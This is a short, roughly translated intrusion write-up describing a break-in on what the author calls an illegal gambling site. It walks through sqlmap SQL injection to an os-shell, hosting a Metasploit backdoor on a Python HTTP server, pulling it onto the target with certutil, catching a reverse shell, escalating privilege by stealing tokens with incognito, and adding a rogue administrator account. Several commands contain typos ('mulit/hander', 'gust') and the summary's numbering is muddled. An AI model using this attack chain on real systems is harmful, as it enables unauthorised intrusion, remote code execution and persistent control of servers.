Title: One hike of rights to illegal websites

0x01  Collect information

Because I mainly want to practice SQL injection, the information collection is relatively simple:

Find the relevant cms through fofa, and here I found that there is a SQL injection vulnerability in the chess and card background login.

0x02 Vulnerability Exploit

1.Use sqlmap a shuttle and get os-shell

2. Use python to build a simple http server and mount the backdoor file generated by MSF

python -m SimpleHTTPServer

3. Remote download backdoor execution program under os-shell

Create a directory under os-shell

mkdir C:\test

Download the backdoor file remotely to the server through the certutil command under os-shell

4. Execute msf rebound shell

use exploit/mulit/hander

set lhost receives the ip of the rebound shell

run

5. Successfully entered the server

At this time, we found that we only have gust permissions.

6. Raise the authority of the target server

Methods of elevating power: kernel escalation and stealing management tokens escalation

This article only uses theft management tokens to increase power

Use use incognito to load the session token module

Then list_tokens -u to list the session token

7. Create a user

Command: net user user name password /add

0x03  Penetration Summary

1. Obtain os-shell2 through SQLmap. Production of backdoor files under msf 3. Build an http server through python -m SimpleHTTPServer and copy the generated backdoor files to the http server directory. 2. Create a directory in os-shell mode and remotely download the backdoor on the http server through certutil. 4. Bounce shell through MSF. Add users under MSF and add them to the administrator group, and you can log in remotely on desktop